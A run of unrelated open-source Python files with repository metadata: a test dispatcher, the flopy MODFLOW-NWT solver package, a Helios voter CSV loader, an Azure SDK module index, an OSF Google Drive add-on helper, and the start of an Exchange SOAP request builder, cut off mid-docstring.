for accumulator in self.accumulators:
accumulator.deinit()
self.reporter.deinit()
self.supervisor.finished_test_suite_result(self.test_suite_result)
class SerialDispatcher(DispatcherBase):
"""Serial dispatcher"""
def __init__(self, supervisor, test_suite_result):
super(SerialDispatcher, self).__init__(supervisor, test_suite_result)
self.to_check = deque()
def init(self):
super(SerialDispatcher, self).init()
for test in self.test_suite_result.test_suite.get_tests():
self.to_check.append(test)
self.send_test()
def checked_test_results(self, test_results):
for result in test_results:
assert result.test_id == self.to_check[0].id
self.to_check.popleft()
self.accumulate(result)
if not self.status():
self.finish()
return
self.send_test()
def send_test(self):
if self.to_check:
submit = self.test_suite_result.submit
test = self.to_check[0]
self.supervisor.schedule_test_result(test_suite_result=self.test_suite_result, submit=submit, test=test)
else:
self.finish()
class ParallelDispatcher(DispatcherBase):
"""Parallel dispatcher"""
def __init__(self, supervisor, test_suite_result):
super(ParallelDispatcher, self).__init__(supervisor, test_suite_result)
self.to_check_id = set()
def init(self):
super(ParallelDispatcher, self).init()
submit = self.test_suite_result.submit
for test in self.test_suite_result.test_suite.get_tests():
self.to_check_id.add(test.id)
self.supervisor.schedule_test_result(test_suite_result=self.test_suite_result, submit=submit, test=test)
if not self.to_check_id:
self.finish()
def checked_test_results(self, test_results):
for result in test_results:
assert result.test_id in self.to_check_id
self.to_check_id.remove(result.test_id)
self.accumulate(result)
if not self.status():
self.finish()
if not self.to_check_id:
self.finish()
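# Registry of the concrete dispatcher classes defined above, keyed by class
# name (e.g. 'SerialDispatcher'), so a dispatcher can be looked up by name.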
dispatchers = {}
for item in globals().values():
if isinstance(item, type) and issubclass(item, DispatcherBase) and (item != DispatcherBase):
dispatchers[item.__name__] = item
| {
"content_hash": "3538855798433d331b5622ab6b3352bf",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 116,
"avg_line_length": 36.59615384615385,
"alnum_prop": 0.63977929584866,
"repo_name": "zielmicha/satori",
"id": "f018ab9bb23ee92367685a827ec302937773c9f9",
"size": "3838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "satori.core/satori/core/checking/dispatchers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "165337"
},
{
"name": "CSS",
"bytes": "72202"
},
{
"name": "HTML",
"bytes": "56647"
},
{
"name": "Java",
"bytes": "270392"
},
{
"name": "JavaScript",
"bytes": "300430"
},
{
"name": "Makefile",
"bytes": "1223"
},
{
"name": "Perl",
"bytes": "1572"
},
{
"name": "Python",
"bytes": "1011796"
},
{
"name": "Shell",
"bytes": "231478"
},
{
"name": "TeX",
"bytes": "17071"
}
],
"symlink_target": ""
} |
"""
mfnwt module. Contains the ModflowNwt class. Note that the user can access
the ModflowNwt class as `flopy.modflow.ModflowNwt`.
Additional information for this MODFLOW package can be found at the `Online
MODFLOW Guide
<http://water.usgs.gov/ogw/modflow-nwt/MODFLOW-NWT-Guide/nwt_newton_solver.htm>`_.
"""
import sys
from ..pakbase import Package
class ModflowNwt(Package):
"""
MODFLOW Nwt Package Class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to which
this package will be added.
headtol : float
is the maximum head change between outer iterations for solution of
        the nonlinear problem. (default is 1e-2).
fluxtol : float
is the maximum l2 norm for solution of the nonlinear problem.
(default is 500).
maxiterout : int
is the maximum number of iterations to be allowed for solution of the
outer (nonlinear) problem. (default is 100).
thickfact : float
is the portion of the cell thickness (length) used for smoothly
adjusting storage and conductance coefficients to zero.
(default is 1e-5).
linmeth : int
is a flag that determines which matrix solver will be used.
A value of 1 indicates GMRES will be used
A value of 2 indicates XMD will be used.
(default is 1).
iprnwt : int
is a flag that indicates whether additional information about solver
convergence will be printed to the main listing file.
(default is 0).
ibotav : int
is a flag that indicates whether corrections will be made to
groundwater head relative to the cell-bottom altitude if the cell is
surrounded by dewatered cells (integer). A value of 1 indicates that a
correction will be made and a value of 0 indicates no correction will
be made. (default is 0).
options : string
SPECIFIED indicates that the optional solver input values listed for
items 1 and 2 will be specified in the NWT input file by the user.
SIMPLE indicates that default solver input values will be defined that
work well for nearly linear models. This would be used for models that
do not include nonlinear stress packages, and models that are either
confined or consist of a single unconfined layer that is thick enough
to contain the water table within a single layer.
MODERATE indicates that default solver input values will be defined
that work well for moderately nonlinear models. This would be used for
models that include nonlinear stress packages, and models that consist
of one or more unconfined layers. The MODERATE option should be used
when the SIMPLE option does not result in successful convergence.
COMPLEX indicates that default solver input values will be defined
that work well for highly nonlinear models. This would be used for
models that include nonlinear stress packages, and models that consist
of one or more unconfined layers representing complex geology and sw/gw
interaction. The COMPLEX option should be used when the MODERATE option
does not result in successful convergence. (default is COMPLEX).
Continue : bool
if the model fails to converge during a time step then it will continue
to solve the following time step. (default is False). Note the capital
C on this option so that it doesn't conflict with a reserved Python
language word.
dbdtheta : float
is a coefficient used to reduce the weight applied to the head change
between nonlinear iterations. dbdtheta is used to control oscillations
in head. Values range between 0.0 and 1.0, and larger values increase
the weight (decrease under-relaxation) applied to the head change.
(default is 0.4).
dbdkappa : float
is a coefficient used to increase the weight applied to the head change
between nonlinear iterations. dbdkappa is used to control oscillations
in head. Values range between 0.0 and 1.0, and larger values increase
the weight applied to the head change. (default is 1.e-5).
dbdgamma : float
is a factor (used to weight the head change for the previous and
current iteration. Values range between 0.0 and 1.0, and greater values
apply more weight to the head change calculated during the current
iteration. (default is 0.)
momfact : float
is the momentum coefficient and ranges between 0.0 and 1.0. Greater
values apply more weight to the head change for the current iteration.
(default is 0.1).
backflag : int
is a flag used to specify whether residual control will be used. A
value of 1 indicates that residual control is active and a value of 0
indicates residual control is inactive. (default is 1).
maxbackiter : int
is the maximum number of reductions (backtracks) in the head change
between nonlinear iterations (integer). A value between 10 and 50
works well. (default is 50).
backtol : float
is the proportional decrease in the root-mean-squared error of the
groundwater-flow equation used to determine if residual control is
required at the end of a nonlinear iteration. (default is 1.1).
backreduce : float
is a reduction factor used for residual control that reduces the head
change between nonlinear iterations. Values should be between 0.0 and
1.0, where smaller values result in smaller head-change values.
(default 0.7).
maxitinner : int
(GMRES) is the maximum number of iterations for the linear solution.
(default is 50).
ilumethod : int
(GMRES) is the index for selection of the method for incomplete
factorization (ILU) used as a preconditioner. (default is 2).
ilumethod = 1 is ILU with drop tolerance and fill limit. Fill-in terms
less than drop tolerance times the diagonal are discarded. The number
of fill-in terms in each row of L and U is limited to the fill limit.
The fill-limit largest elements are kept in the L and U factors.
ilumethod=2 is ILU(k) order k incomplete LU factorization. Fill-in
terms of higher order than k in the factorization are discarded.
levfill : int
(GMRES) is the fill limit for ILUMETHOD = 1 and is the level of fill
for ilumethod = 2. Recommended values: 5-10 for method 1, 0-2 for
method 2. (default is 5).
stoptol : float
(GMRES) is the tolerance for convergence of the linear solver. This is
the residual of the linear equations scaled by the norm of the root
mean squared error. Usually 1.e-8 to 1.e-12 works well.
(default is 1.e-10).
msdr : int
(GMRES) is the number of iterations between restarts of the GMRES
Solver. (default is 15).
iacl : int
(XMD) is a flag for the acceleration method: 0 is conjugate gradient, 1 is ORTHOMIN,
2 is Bi-CGSTAB. (default is 2).
norder : int
(XMD) is a flag for the scheme of ordering the unknowns: 0 is original
ordering, 1 is RCM ordering, 2 is Minimum Degree ordering.
(default is 1).
level : int
(XMD) is the level of fill for incomplete LU factorization.
(default is 5).
north : int
(XMD) is the number of orthogonalization for the ORTHOMIN acceleration
scheme. A number between 4 and 10 is appropriate. Small values require
less storage but more iterations may be required. This number should
equal 2 for the other acceleration methods. (default is 7).
iredsys : int
(XMD) is a flag for reduced system preconditioning (integer): 0-do not
apply reduced system preconditioning, 1-apply reduced system
preconditioning. (default is 0)
    rrctols : float
(XMD) is the residual reduction-convergence criteria. (default is 0.).
idroptol : int
(XMD) is a flag for using drop tolerance in the preconditioning:
0-don't use drop tolerance, 1-use drop tolerance. (default is 1).
epsrn : float
(XMD) is the drop tolerance for preconditioning. (default is 1.e-4).
hclosexmd : float
(XMD) is the head closure criteria for inner (linear) iterations.
(default is 1.e-4).
mxiterxmd : int
(XMD) is the maximum number of iterations for the linear solution.
(default is 50).
extension : list string
Filename extension (default is 'nwt')
unitnumber : int
File unit number (default is None).
filenames : str or list of str
Filenames to use for the package. If filenames=None the package name
will be created using the model name and package extension. If a
single string is passed the package will be set to the string.
Default is None.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
    >>> m = flopy.modflow.Modflow(version='mfnwt')
>>> nwt = flopy.modflow.ModflowNwt(m)
"""
def __init__(
self,
model,
headtol=1e-2,
fluxtol=500,
maxiterout=100,
thickfact=1e-5,
linmeth=1,
iprnwt=0,
ibotav=0,
options="COMPLEX",
Continue=False,
dbdtheta=0.4,
dbdkappa=1.0e-5,
dbdgamma=0.0,
momfact=0.1,
backflag=1,
maxbackiter=50,
backtol=1.1,
backreduce=0.70,
maxitinner=50,
ilumethod=2,
levfill=5,
stoptol=1.0e-10,
msdr=15,
iacl=2,
norder=1,
level=5,
north=7,
iredsys=0,
rrctols=0.0,
idroptol=1,
epsrn=1.0e-4,
hclosexmd=1e-4,
mxiterxmd=50,
extension="nwt",
unitnumber=None,
filenames=None,
):
if model.version != "mfnwt":
err = "Error: model version must be mfnwt to use NWT package"
raise Exception(err)
# set default unit number of one is not specified
if unitnumber is None:
unitnumber = ModflowNwt.defaultunit()
# set filenames
if filenames is None:
filenames = [None]
elif isinstance(filenames, str):
filenames = [filenames]
# Fill namefile items
name = [ModflowNwt.ftype()]
units = [unitnumber]
extra = [""]
# set package name
fname = [filenames[0]]
# Call ancestor's init to set self.parent, extension, name and unit number
Package.__init__(
self,
model,
extension=extension,
name=name,
unit_number=units,
extra=extra,
filenames=fname,
)
self.heading = (
"# {} package for ".format(self.name[0])
+ " {}, ".format(model.version_types[model.version])
+ "generated by Flopy."
)
self.url = "nwt_newton_solver.htm"
self.headtol = headtol
self.fluxtol = fluxtol
self.maxiterout = maxiterout
self.thickfact = thickfact
self.linmeth = linmeth
self.iprnwt = iprnwt
self.ibotav = ibotav
if isinstance(options, list):
self.options = options
else:
self.options = [options.upper()]
if Continue:
self.options.append("CONTINUE")
self.dbdtheta = dbdtheta
self.dbdkappa = dbdkappa
self.dbdgamma = dbdgamma
self.momfact = momfact
self.backflag = backflag
self.maxbackiter = maxbackiter
self.backtol = backtol
self.backreduce = backreduce
self.maxitinner = maxitinner
self.ilumethod = ilumethod
self.levfill = levfill
self.stoptol = stoptol
self.msdr = msdr
self.iacl = iacl
self.norder = norder
self.level = level
self.north = north
self.iredsys = iredsys
self.rrctols = rrctols
self.idroptol = idroptol
self.epsrn = epsrn
self.hclosexmd = hclosexmd
self.mxiterxmd = mxiterxmd
self.parent.add_package(self)
def write_file(self):
"""
Write the package file.
Returns
-------
None
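        Examples
        --------
        A minimal sketch (assumes a model created with version='mfnwt'; the
        model and file names below are flopy defaults and only illustrative):
        >>> import flopy
        >>> m = flopy.modflow.Modflow(version='mfnwt')
        >>> nwt = flopy.modflow.ModflowNwt(m)
        >>> nwt.write_file()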
"""
# Open file for writing
f = open(self.fn_path, "w")
f.write("%s\n" % self.heading)
f.write(
"{:10.3e}{:10.3e}{:10d}{:10.3e}{:10d}{:10d}{:10d}".format(
self.headtol,
self.fluxtol,
self.maxiterout,
self.thickfact,
self.linmeth,
self.iprnwt,
self.ibotav,
)
)
isspecified = False
for option in self.options:
f.write("{0:>10s}".format(option.upper()))
if option.lower() == "specified":
isspecified = True
if isspecified:
f.write("{0:10.4g}".format(self.dbdtheta))
f.write("{0:10.4g}".format(self.dbdkappa))
f.write("{0:10.4g}".format(self.dbdgamma))
f.write("{0:10.4g}".format(self.momfact))
f.write("{0:10d}".format(self.backflag))
if self.backflag > 0:
f.write("{0:10d}".format(self.maxbackiter))
f.write("{0:10.4g}".format(self.backtol))
f.write("{0:10.4g}".format(self.backreduce))
f.write("\n")
if self.linmeth == 1:
f.write("{0:10d}".format(self.maxitinner))
f.write("{0:10d}".format(self.ilumethod))
f.write("{0:10d}".format(self.levfill))
f.write("{0:10.4g}".format(self.stoptol))
f.write("{0:10d}".format(self.msdr))
elif self.linmeth == 2:
f.write("{0:10d}".format(self.iacl))
f.write("{0:10d}".format(self.norder))
f.write("{0:10d}".format(self.level))
f.write("{0:10d}".format(self.north))
f.write("{0:10d}".format(self.iredsys))
f.write("{0:10.4g}".format(self.rrctols))
f.write("{0:10d}".format(self.idroptol))
f.write("{0:10.4g}".format(self.epsrn))
f.write("{0:10.4g}".format(self.hclosexmd))
f.write("{0:10d}".format(self.mxiterxmd))
f.write("\n")
f.close()
@staticmethod
def load(f, model, ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to
which this package will be added.
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
nwt : ModflowNwt object
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
        >>> nwt = flopy.modflow.ModflowNwt.load('test.nwt', m)
"""
import collections
if model.verbose:
sys.stdout.write("loading nwt package file...\n")
if model.version != "mfnwt":
msg = (
"Warning: model version was reset from "
+ "'{}' to 'mfnwt' in order to load a NWT file".format(
model.version
)
)
print(msg)
model.version = "mfnwt"
openfile = not hasattr(f, "read")
if openfile:
filename = f
f = open(filename, "r")
# dataset 0 -- header
flines = [
line.strip()
for line in f.readlines()
if not line.strip().startswith("#")
]
if openfile:
f.close()
line = flines.pop(0)
# dataset 1
ifrfm = True # model.free_format_input
vars = (
("headtol", float),
("fluxtol", float),
("maxiterout", int),
("thickfact", float),
("linmeth", int),
("iprnwt", int),
("ibotav", int),
("options", str),
("Continue", str),
)
vars = collections.OrderedDict(vars)
kwargs = {}
if ifrfm:
t = line.split()
else:
t = []
try:
for idx, (k, c) in enumerate(vars.items()):
t.append(line[idx * 10 : (idx + 1) * 10])
        except Exception:
if model.verbose:
print(" did not parse fixed format dataset 1")
try:
for i, (v, c) in enumerate(vars.items()):
kwargs[v] = c(t[i].strip())
        except Exception:
if model.verbose:
print(" did not generate dataset 1 kwargs")
if "Continue" in kwargs:
if "CONTINUE" in kwargs["Continue"].upper():
kwargs["Continue"] = True
else:
kwargs.pop("Continue")
specdict = (
("dbdtheta", float),
("dbdkappa", float),
("dbdgamma", float),
("momfact", float),
("backflag", int),
("maxbackiter", int),
("backtol", float),
("backreduce", float),
)
specdict = collections.OrderedDict(specdict)
ipos = len(kwargs)
if kwargs["options"].lower().strip() == "specified":
for (k, c) in specdict.items():
if ifrfm:
kwargs[k] = c(t[ipos].strip())
else:
kwargs[k] = c(line[ipos * 10 : (ipos + 1) * 10].strip())
if k == "backflag":
if kwargs["backflag"] == 0:
break
ipos += 1
# dataset 2
try:
line = flines.pop(0)
        except IndexError:
raise Exception(
'Error: OPTIONS set to "Specified" but only one line in NWT file'
)
lindict = {}
if kwargs["linmeth"] == 1:
lindict = (
("maxitinner", int),
("ilumethod", int),
("levfill", int),
("stoptol", float),
("msdr", int),
)
elif kwargs["linmeth"] == 2:
lindict = (
("iacl", int),
("norder", int),
("level", int),
("north", int),
("iredsys", int),
("rrctols", float),
("idroptol", int),
("epsrn", float),
("hclosexmd", float),
("mxiterxmd", int),
)
lindict = collections.OrderedDict(lindict)
if ifrfm:
t = line.split()
else:
t = []
for idx, (k, c) in enumerate(lindict.items()):
t.append(line[idx * 10 : (idx + 1) * 10])
for idx, (k, c) in enumerate(lindict.items()):
# forgive missing value for MXITERXMD (last value)
# (apparently NWT runs without it)
if len(t) > 0:
kwargs[k] = c(t.pop(0))
# determine specified unit number
# set package unit number
unitnumber = None
filenames = [None]
if ext_unit_dict is not None:
unitnumber, filenames[0] = model.get_ext_dict_attr(
ext_unit_dict, filetype=ModflowNwt.ftype()
)
kwargs["unitnumber"] = unitnumber
kwargs["filenames"] = filenames
# create and return an instance of the nwt class
return ModflowNwt(model, **kwargs)
@staticmethod
def ftype():
return "NWT"
@staticmethod
def defaultunit():
return 32
| {
"content_hash": "0d2af315d9a9cae1196be1c163f3cda4",
"timestamp": "",
"source": "github",
"line_count": 567,
"max_line_length": 92,
"avg_line_length": 36.32098765432099,
"alnum_prop": 0.5613771001262504,
"repo_name": "aleaf/flopy",
"id": "c798a9559923d3ffa0567a75998efaf784a2e282",
"size": "20594",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "flopy/modflow/mfnwt.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "67"
},
{
"name": "Python",
"bytes": "5469342"
},
{
"name": "Shell",
"bytes": "2562"
}
],
"symlink_target": ""
} |
"""
parse and set up voters from uploaded voter files
DEPRECATED
Ben Adida
ben@adida.net
2010-05-22
"""
from django.core.management.base import BaseCommand, CommandError
import csv, datetime
from helios import utils as helios_utils
from helios.models import *
##
## UTF8 craziness for CSV
##
def unicode_csv_reader(unicode_csv_data, dialect=csv.excel, **kwargs):
# csv.py doesn't do Unicode; encode temporarily as UTF-8:
csv_reader = csv.reader(utf_8_encoder(unicode_csv_data),
dialect=dialect, **kwargs)
for row in csv_reader:
# decode UTF-8 back to Unicode, cell by cell:
yield [unicode(cell, 'utf-8') for cell in row]
def utf_8_encoder(unicode_csv_data):
for line in unicode_csv_data:
yield line.encode('utf-8')
def process_csv_file(election, f):
reader = unicode_csv_reader(f)
num_voters = 0
for voter in reader:
# bad line
if len(voter) < 1:
continue
num_voters += 1
voter_id = voter[0]
name = voter_id
email = voter_id
if len(voter) > 1:
email = voter[1]
if len(voter) > 2:
name = voter[2]
# create the user
user = User.update_or_create(user_type='password', user_id=voter_id, info = {'password': helios_utils.random_string(10), 'email': email, 'name': name})
user.save()
# does voter for this user already exist
voter = Voter.get_by_election_and_user(election, user)
# create the voter
if not voter:
voter_uuid = str(uuid.uuid1())
voter = Voter(uuid= voter_uuid, voter_type = 'password', voter_id = voter_id, name = name, election = election)
voter.save()
return num_voters
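##
## Illustrative CSV layout (a sketch inferred from the indexing above,
## not part of the original module): one voter per row, with optional
## email and name columns.
##
##   voter_id_1
##   voter_id_2,voter2@example.com
##   voter_id_3,voter3@example.com,Voter Three
##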
class Command(BaseCommand):
args = ''
help = 'load up voters from unprocessed voter files'
def handle(self, *args, **options):
# load up the voter files in order of last uploaded
files_to_process = VoterFile.objects.filter(processing_started_at=None).order_by('uploaded_at')
for file_to_process in files_to_process:
# mark processing begins
file_to_process.processing_started_at = datetime.datetime.utcnow()
file_to_process.save()
num_voters = process_csv_file(file_to_process.election, file_to_process.voter_file)
# mark processing done
file_to_process.processing_finished_at = datetime.datetime.utcnow()
file_to_process.num_voters = num_voters
file_to_process.save()
| {
"content_hash": "94fbb3fe9fbf5e1f5cf6342ebadaa043",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 157,
"avg_line_length": 28.744444444444444,
"alnum_prop": 0.6165442597603401,
"repo_name": "dmgawel/helios-server",
"id": "5b82285a68650b1a06ae36c0f3bb3dd0cea236e7",
"size": "2587",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "helios/management/commands/load_voter_files.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15450"
},
{
"name": "HTML",
"bytes": "160246"
},
{
"name": "Java",
"bytes": "2271"
},
{
"name": "JavaScript",
"bytes": "307727"
},
{
"name": "Python",
"bytes": "698297"
},
{
"name": "Shell",
"bytes": "324"
}
],
"symlink_target": ""
} |
from ._operations import Operations
from ._admin_keys_operations import AdminKeysOperations
from ._query_keys_operations import QueryKeysOperations
from ._services_operations import ServicesOperations
from ._private_link_resources_operations import PrivateLinkResourcesOperations
from ._private_endpoint_connections_operations import PrivateEndpointConnectionsOperations
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"Operations",
"AdminKeysOperations",
"QueryKeysOperations",
"ServicesOperations",
"PrivateLinkResourcesOperations",
"PrivateEndpointConnectionsOperations",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| {
"content_hash": "7ab3df75a531a2b56b329827c9eac9d4",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 38.333333333333336,
"alnum_prop": 0.7714285714285715,
"repo_name": "Azure/azure-sdk-for-python",
"id": "5f7e85a6a72d9cc52eb894f675986aba4735418d",
"size": "1273",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/search/azure-mgmt-search/azure/mgmt/search/aio/operations/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""Utility functions for the Google Drive add-on.
"""
import os
import logging
from urllib import quote
from website.util import web_url_for
from website.addons.googledrive.exceptions import ExpiredAuthError
logger = logging.getLogger(__name__)
class GoogleDriveNodeLogger(object):
"""Helper class for adding correctly-formatted Google Drive logs to nodes.
Usage: ::
from website.project.model import NodeLog
file_obj = GoogleDriveGuidFile(path='foo/bar.txt')
file_obj.save()
node = ...
auth = ...
nodelogger = GoogleDriveNodeLogger(node, auth, file_obj)
nodelogger.log(NodeLog.FILE_REMOVED, save=True)
:param Node node: The node to add logs to
:param Auth auth: Authorization of the person who did the action.
:param GoogleDriveGuidFile file_obj: File object for file-related logs.
"""
def __init__(self, node, auth, file_obj=None, path=None):
self.node = node
self.auth = auth
self.file_obj = file_obj
self.path = path
def log(self, action, extra=None, save=False):
"""Log an event. Wraps the Node#add_log method, automatically adding
relevant parameters and prefixing log events with `"googledrive_"`.
:param str action: Log action. Should be a class constant from NodeLog.
:param dict extra: Extra parameters to add to the ``params`` dict of the
new NodeLog.
"""
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
'folder': self.node.get_addon('googledrive', deleted=True).folder_path
}
if extra:
params.update(extra)
# Prefix the action with googledrive
self.node.add_log(
action="googledrive_{0}".format(action),
params=params,
auth=self.auth
)
if save:
self.node.save()
def serialize_urls(node_settings):
node = node_settings.owner
return {
'files': node.web_url_for('collect_file_trees'),
'config': node.api_url_for('googledrive_config_put'),
'create': node.api_url_for('googledrive_oauth_start'),
'deauthorize': node.api_url_for('googledrive_deauthorize'),
'importAuth': node.api_url_for('googledrive_import_user_auth'),
'folders': node.api_url_for('googledrive_folders'),
'auth': node.api_url_for('googledrive_oauth_start'),
}
def serialize_settings(node_settings, current_user):
"""
View helper that returns a dictionary representation of a GoogleDriveNodeSettings record.
Provides the return value for the googledrive config endpoints.
"""
user_settings = node_settings.user_settings
user_is_owner = user_settings is not None and user_settings.owner == current_user
current_user_settings = current_user.get_addon('googledrive')
valid_credentials = True
if user_settings:
try:
user_settings.fetch_access_token()
except ExpiredAuthError:
valid_credentials = False
ret = {
'nodeHasAuth': node_settings.has_auth,
'userIsOwner': user_is_owner,
'userHasAuth': current_user_settings is not None and current_user_settings.has_auth,
'urls': serialize_urls(node_settings),
'validCredentials': valid_credentials,
}
if node_settings.has_auth:
# Add owner's profile URL
path = node_settings.folder_path
if path is not None:
ret['folder'] = {
'name': '/ (Full Google Drive)' if path == '/' else '/' + path,
'path': '/' + path.lstrip('/'),
}
ret['ownerName'] = user_settings.owner.fullname
ret['urls']['owner'] = web_url_for('profile_view_id', uid=user_settings.owner._id)
return ret
def build_googledrive_urls(item, node, path):
return {
'fetch': node.api_url_for('googledrive_folders', folderId=item['id']),
'folders': node.api_url_for('googledrive_folders', folderId=item['id'], path=path),
}
def to_hgrid(item, node, path):
"""
:param item: contents returned from Google Drive API
:return: results formatted as required for Hgrid display
"""
safe_name = quote(item['title'], safe='')
path = os.path.join(path, safe_name)
serialized = {
'path': path,
'id': item['id'],
'kind': 'folder',
'name': safe_name,
'addon': 'googledrive',
'urls': build_googledrive_urls(item, node, path=path)
}
return serialized
| {
"content_hash": "10564f4d2ce50cbe97377ac2c3d2cf3b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 93,
"avg_line_length": 32.96402877697842,
"alnum_prop": 0.6195984286337843,
"repo_name": "himanshuo/osf.io",
"id": "4ce583df9076174942bdfd8abdb2867efa3b1c4f",
"size": "4606",
"binary": false,
"copies": "5",
"ref": "refs/heads/develop",
"path": "website/addons/googledrive/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "78345"
},
{
"name": "HTML",
"bytes": "34188"
},
{
"name": "JavaScript",
"bytes": "885345"
},
{
"name": "Mako",
"bytes": "442634"
},
{
"name": "Python",
"bytes": "2536134"
},
{
"name": "Shell",
"bytes": "234"
}
],
"symlink_target": ""
} |
"""
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
from lxml.builder import ElementMaker
from ..utils import convert_datetime_to_utc
from ..compat import _unicode
MSG_NS = u'http://schemas.microsoft.com/exchange/services/2006/messages'
TYPE_NS = u'http://schemas.microsoft.com/exchange/services/2006/types'
SOAP_NS = u'http://schemas.xmlsoap.org/soap/envelope/'
NAMESPACES = {u'm': MSG_NS, u't': TYPE_NS, u's': SOAP_NS}
M = ElementMaker(namespace=MSG_NS, nsmap=NAMESPACES)
T = ElementMaker(namespace=TYPE_NS, nsmap=NAMESPACES)
EXCHANGE_DATETIME_FORMAT = u"%Y-%m-%dT%H:%M:%SZ"
EXCHANGE_DATE_FORMAT = u"%Y-%m-%d"
DISTINGUISHED_IDS = (
'calendar', 'contacts', 'deleteditems', 'drafts', 'inbox', 'journal', 'notes', 'outbox', 'sentitems',
'tasks', 'msgfolderroot', 'root', 'junkemail', 'searchfolders', 'voicemail', 'recoverableitemsroot',
'recoverableitemsdeletions', 'recoverableitemsversions', 'recoverableitemspurges', 'archiveroot',
'archivemsgfolderroot', 'archivedeleteditems', 'archiverecoverableitemsroot',
'Archiverecoverableitemsdeletions', 'Archiverecoverableitemsversions', 'Archiverecoverableitemspurges',
)
def exchange_header():
return T.RequestServerVersion({u'Version': u'Exchange2010'})
def resource_node(element, resources):
"""
Helper function to generate a person/conference room node from an email address
<t:OptionalAttendees>
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
</t:OptionalAttendees>
"""
for attendee in resources:
element.append(
T.Attendee(
T.Mailbox(
T.EmailAddress(attendee.email)
)
)
)
return element
def delete_field(field_uri):
"""
Helper function to request deletion of a field. This is necessary when you want to overwrite values instead of
appending.
<t:DeleteItemField>
<t:FieldURI FieldURI="calendar:Resources"/>
</t:DeleteItemField>
"""
root = T.DeleteItemField(
T.FieldURI(FieldURI=field_uri)
)
return root
def get_item(exchange_id, format=u"Default"):
"""
Requests a calendar item from the store.
exchange_id is the id for this event in the Exchange store.
    format controls how much data you get back from Exchange. Full docs are here, but acceptable values
are IdOnly, Default, and AllProperties.
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="{exchange_id}"/>
</m:ItemIds>
</m:GetItem>
"""
elements = list()
    if isinstance(exchange_id, list):
for item in exchange_id:
elements.append(T.ItemId(Id=item))
else:
elements = [T.ItemId(Id=exchange_id)]
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds(
*elements
)
)
return root
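# Illustrative usage (a sketch, not part of the original module): build a
# GetItem request body and serialize it for a SOAP envelope. The item id
# below is hypothetical.
#
#   >>> from lxml import etree
#   >>> body = get_item(u"AAMkADhhOGU0", format=u"AllProperties")
#   >>> print(etree.tostring(body, pretty_print=True))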
def get_calendar_items(format=u"Default", start=None, end=None, max_entries=999999):
start = start.strftime(EXCHANGE_DATETIME_FORMAT)
end = end.strftime(EXCHANGE_DATETIME_FORMAT)
root = M.FindItem(
{u'Traversal': u'Shallow'},
M.ItemShape(
T.BaseShape(format)
),
M.CalendarView({
u'MaxEntriesReturned': _unicode(max_entries),
u'StartDate': start,
u'EndDate': end,
}),
M.ParentFolderIds(T.DistinguishedFolderId(Id=u"calendar")),
)
return root
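# Illustrative usage (a sketch, not part of the original module): request
# the distinguished "calendar" folder's events for a one-week window.
#
#   >>> from datetime import datetime
#   >>> body = get_calendar_items(format=u"Default",
#   ...                           start=datetime(2014, 1, 1),
#   ...                           end=datetime(2014, 1, 8))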
def get_master(exchange_id, format=u"Default"):
"""
Requests a calendar item from the store.
exchange_id is the id for this event in the Exchange store.
    format controls how much data you get back from Exchange. Full docs are here, but acceptable values
are IdOnly, Default, and AllProperties.
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
